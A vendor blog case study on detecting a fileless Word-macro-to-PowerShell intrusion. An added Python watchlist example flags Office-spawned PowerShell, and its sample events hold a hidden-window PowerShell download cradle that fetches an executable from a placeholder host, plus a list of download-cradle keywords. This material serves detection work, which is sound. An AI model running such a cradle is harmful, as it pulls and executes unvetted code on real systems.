Carbon Black Report: A Case Study on Threat Hunting


There are certain seminal experiences you’ll remember all your life — your first kiss, your college graduation, the smell of your favorite home-cooked meal — and then hundreds of mini-experiences that helped you reach each milestone that in short order disappeared from view.

The memories you carry with you forever? That is akin to what computers save to disk. The other stuff? That’s like (ironically enough) system memory. Attackers used to execute malicious code on disk, where antivirus could better detect it. Today, as Black Cipher’s IR team saw firsthand at a large real estate and investment firm, cyber criminals have become sophisticated enough to carry out attacks through memory. As memory fades, the attackers’ tracks are covered, which makes detection — and ultimately remediation — a true challenge.

The malware, in this case, arrived in a malicious Microsoft Word document labeled as an invoice. When someone inside the organization opened it, a macro ran that launched the command prompt, which in turn launched PowerShell. PowerShell reached out to a malware distribution server, pulled down a malicious executable, ran it and then deleted it. The malware called back to a command-and-control server, giving the attacker a covert tunnel into the network. This tunnel opened the door for further activity such as data exfiltration, keystroke logging, credential theft and lateral movement.

This breach would have been virtually impossible to detect had it not been for Bit9 Advanced Threats feeds combined with Cb Response’s ability to create custom watchlists, which gave Black Cipher the network visibility it needed to quickly identify the entry point and terminate the attacker’s connection. What’s more, the tool allowed the IR team to remotely extract system memory to understand the nature of the threat (e.g., are they taking screenshots? Pulling documents?). This was especially crucial because the client fell under NY DFS 500 compliance and needed to quickly know whether or not to report.
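The process chain described above (Word document, macro, command prompt, PowerShell, download) is exactly the kind of pattern a custom watchlist is built to catch. The following is an added example, not Carbon Black's code and not Cb Response's own query syntax: it runs watchlist-style logic over constructed process-creation events, flagging PowerShell launched from an Office application either directly or through cmd.exe, and raising the severity when the command line carries download-cradle markers. All process records, paths and the URL are constructed for the example.

```python
"""Watchlist-style detection of the Office -> cmd.exe -> PowerShell chain.

Added example; not Carbon Black's code or its watchlist query language.
Every event record below is constructed sample data.
"""
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class ProcEvent:
    pid: int        # process id
    ppid: int       # parent process id
    name: str       # image name as recorded by the sensor, e.g. "powershell.exe"
    cmdline: str    # full command line as recorded by the sensor


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
INTERMEDIATE_SHELLS = {"cmd.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Substrings typical of a PowerShell download cradle, matched case-insensitively.
DOWNLOAD_MARKERS = ("downloadfile", "downloadstring", "invoke-webrequest",
                    "net.webclient", "start-bitstransfer")


def ancestry(event: ProcEvent, by_pid: Dict[int, ProcEvent],
             depth: int = 3) -> List[ProcEvent]:
    """Return [event, parent, grandparent, ...] with at most `depth` entries."""
    chain = [event]
    while len(chain) < depth and chain[-1].ppid in by_pid:
        chain.append(by_pid[chain[-1].ppid])
    return chain


def detect_office_powershell_chain(events: List[ProcEvent]) -> List[dict]:
    """Flag PowerShell whose parent (or grandparent via cmd.exe) is an Office app."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        if ev.name.lower() not in POWERSHELL:
            continue
        names = [p.name.lower() for p in ancestry(ev, by_pid)]
        # names[0] is PowerShell itself; the Office app must be its parent,
        # or its grandparent with cmd.exe in between.
        direct = len(names) >= 2 and names[1] in OFFICE_APPS
        via_cmd = (len(names) >= 3 and names[1] in INTERMEDIATE_SHELLS
                   and names[2] in OFFICE_APPS)
        if not (direct or via_cmd):
            continue
        lowered = ev.cmdline.lower()
        markers = [m for m in DOWNLOAD_MARKERS if m in lowered]
        findings.append({
            "pid": ev.pid,
            "chain": " -> ".join(reversed(names)),
            "download_markers": markers,
            "severity": "high" if markers else "medium",
        })
    return findings


# Constructed sensor events: one malicious chain plus two benign PowerShell launches.
CRADLE = ("powershell.exe -nop -w hidden -c "
          "(New-Object Net.WebClient).DownloadFile("
          "'http://dist.example.invalid/inv.exe','C:\\Users\\Public\\inv.exe')")
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "C:\\Windows\\explorer.exe"),
    ProcEvent(200, 100, "WINWORD.EXE",
              "\"C:\\Program Files\\Microsoft Office\\WINWORD.EXE\" /n invoice.docx"),
    ProcEvent(300, 200, "cmd.exe", "cmd.exe /c " + CRADLE),
    ProcEvent(400, 300, "powershell.exe", CRADLE),
    ProcEvent(500, 100, "powershell.exe", "powershell.exe -File C:\\scripts\\backup.ps1"),
    ProcEvent(600, 100, "cmd.exe", "cmd.exe"),
    ProcEvent(700, 600, "powershell.exe", "powershell.exe -c Get-Date"),
]

if __name__ == "__main__":
    for finding in detect_office_powershell_chain(SAMPLE_EVENTS):
        print(finding)
```

Only the chain rooted at WINWORD.EXE is reported; the PowerShell launched from Explorer, and the one launched from a cmd.exe that Explorer spawned, are left alone. Keying on process lineage rather than on the downloaded file is what makes the rule useful here: the executable deleted itself after running, but the parent-child relationships remain in the endpoint telemetry.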

Within two hours, the IR team had the attacker out of the system and was able to provide the answers the client needed to determine its compliance reporting requirements. The speed and efficiency of Black Cipher’s response were aided not only by Carbon Black but also by the client’s own proactive IR plan, which in this case immediately initiated credential changes and other protocols that softened the blow of the attack.

Incident response like this? Definitely worth remembering.

The post Carbon Black Report: A Case Study on Threat Hunting appeared first on Carbon Black.

About Carbon Black, Inc.
Carbon Black is the leading provider of next-generation endpoint security. Carbon Black’s Next-Generation Antivirus (NGAV) solution, Cb Defense, leverages breakthrough prevention technology, “Streaming Prevention,” to instantly see and stop cyberattacks before they execute. Cb Defense uniquely combines breakthrough prevention with market-leading detection and response into a single, lightweight agent delivered through the cloud. With more than 7 million endpoints under management, Carbon Black has more than 2,500 customers, including 30 of the Fortune 100. These customers use Carbon Black to replace legacy antivirus, lock down critical systems, hunt threats, and protect their endpoints from the most advanced cyberattacks, including non-malware attacks.